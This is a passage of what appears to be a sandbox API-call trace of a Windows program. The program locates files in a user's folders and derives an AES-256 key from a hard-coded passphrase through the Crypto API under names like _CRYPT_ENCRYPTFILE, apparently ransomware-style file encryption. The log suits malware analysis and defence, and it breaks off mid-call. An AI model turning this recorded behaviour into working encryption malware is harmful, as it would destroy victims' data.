lpMsg=0x144e29c) returned 0 [0106.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0106.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0106.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0106.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0106.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0106.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0106.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0106.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0106.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0106.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0106.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0106.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0106.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0106.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0106.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0106.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0106.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0106.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0106.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0106.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0106.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0106.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0106.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0106.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0106.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0106.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0106.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0106.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0106.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0106.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0106.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0106.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0106.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0106.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b22250 | out: hHeap=0x1780000) returned 1 [0106.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0106.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0106.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0106.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0106.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0106.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0106.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0106.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0106.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0106.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0106.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0106.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0106.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0106.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0106.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0106.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0106.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0106.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0106.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0106.640] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0106.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca928, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0106.640] CloseHandle (hObject=0x258) returned 1 [0106.640] FreeLibrary (hLibModule=0x772d0000) returned 1 [0106.640] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0106.641] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\u5YsBEddaGYJI-.swf", lpFindFileData=0x144e3c8 | out: lpFindFileData=0x144e3c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe830870, ftCreationTime.dwHighDateTime=0x1d5e515, ftLastAccessTime.dwLowDateTime=0xd21e2dd0, ftLastAccessTime.dwHighDateTime=0x1d5e24d, ftLastWriteTime.dwLowDateTime=0xd21e2dd0, ftLastWriteTime.dwHighDateTime=0x1d5e24d, nFileSizeHigh=0x0, nFileSizeLow=0xd19f, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="u5YsBEddaGYJI-.swf", cAlternateFileName="U5YSBE~1.SWF")) returned 0x41ac140 [0106.641] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0106.641] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0106.641] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0106.641] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0106.688] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0106.688] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0106.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796f08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0106.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0106.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796d68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0106.688] CryptAcquireContextA (in: phProv=0x144e0a8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e0a8*=0x41a5250) returned 1 [0106.689] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0106.689] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0106.689] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0106.689] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0106.689] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0106.689] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0106.689] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0106.689] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0106.689] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0106.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cad90, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0106.689] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144de18 | out: phHash=0x144de18) returned 1 [0106.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0106.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0106.689] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0106.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0106.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0106.689] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0106.690] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0106.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cb030, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0106.690] CryptHashData (hHash=0x41ac040, pbData=0x17e2728, dwDataLen=0x22, dwFlags=0x1) returned 1 [0106.690] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0106.690] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0106.690] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0106.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cb048, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0106.690] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac040, dwFlags=0x1, phKey=0x144de18 | out: phKey=0x144de18*=0x41ac140) returned 1 [0106.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d00 [0106.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e95f0 [0106.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0106.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0106.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0106.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0106.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c90 [0106.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0106.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0106.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0106.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cb0 [0106.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0106.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0106.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0106.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ba0 [0106.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0106.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0106.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0106.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c70 [0106.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0106.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0106.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0106.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c40 [0106.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0106.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0106.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0106.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bc0 [0106.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0106.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cd0 [0106.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea958 [0106.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b90 [0106.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2be0 [0106.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0106.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0106.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c10 [0106.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0106.691] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0106.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0106.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c50 [0106.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bd0 [0106.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0106.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0106.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0106.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0106.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caeb0 [0106.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cadd8 [0106.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf28 [0106.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0106.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cadf0 [0106.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb060 [0106.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf58 [0106.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb000 [0106.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0106.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae38 [0106.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0106.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf40 [0106.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0106.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae98 [0106.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafb8 [0106.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0106.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf88 [0106.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae08 [0106.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0106.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad90 [0106.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae50 [0106.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0106.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0106.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ba0 [0106.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cc0 [0106.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0106.693] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0106.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafe8 [0106.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0106.693] PeekMessageW (in: lpMsg=0x144df54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df54) returned 0 [0106.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0106.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c50 [0106.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0106.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b70 [0106.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0106.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0106.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c80 [0106.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0106.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0106.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c10 [0106.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0106.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0106.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0106.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c60 [0106.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0106.693] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0106.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0106.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d20 [0106.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0106.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0106.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b80 [0106.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0106.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ca0 [0106.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b70 [0106.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0106.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0106.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c40 [0106.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0106.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1797088 [0106.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797088, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0106.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d02d8 [0106.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0350 [0106.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c70 [0106.694] CryptDestroyHash (hHash=0x41ac040) returned 1 [0106.694] RtlAllocateHeap 